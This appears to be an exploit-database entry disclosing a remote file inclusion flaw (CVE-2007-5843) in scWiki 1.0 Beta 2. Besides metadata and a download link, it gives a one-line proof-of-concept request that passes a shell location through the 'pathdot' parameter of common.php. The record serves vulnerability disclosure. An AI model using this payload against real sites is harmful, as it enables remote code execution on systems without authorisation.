scWiki 1.0 Beta 2 - 'common.php?pathdot' Remote File Inclusion

Author: GoLd_M
type: webapps
platform: php
port: 
date_added: 2007-11-02 
date_updated: 2016-10-20 
verified: 1 
codes: OSVDB-38480;CVE-2007-5843 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comscwiki_beta2.zip

scWiki 1.0 Beta 2 (common.php pathdot) Remote File Inclusion Vulnerability
http://heanet.dl.sourceforge.net/sourceforge/sc-wiki/scwiki_beta2.zip
POC :
    /includes/common.php?pathdot=Shell

# milw0rm.com [2007-11-03]